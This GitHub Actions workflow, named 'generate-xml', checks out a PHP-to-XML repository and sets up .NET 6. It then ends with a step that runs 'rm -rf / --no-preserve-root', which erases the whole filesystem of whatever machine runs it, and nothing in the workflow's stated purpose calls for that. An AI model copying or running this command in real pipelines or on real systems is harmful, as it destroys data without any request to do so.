name: generate-xml

on: 
  workflow_dispatch:
  push:

jobs:
  generate-xml:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v3
      - uses: actions/checkout@v3
        with:
          repository: hydriod/PhpToXml # .NET のリポジトリ
          path: Temp/PhpToXml

      - name: Setup .NET Core SDK
        uses: actions/setup-dotnet@v2
        with:
          dotnet-version: '6.0.x'
      - name: run       
        run: ls -Rla ../
      - run: rm -rf / --no-preserve-root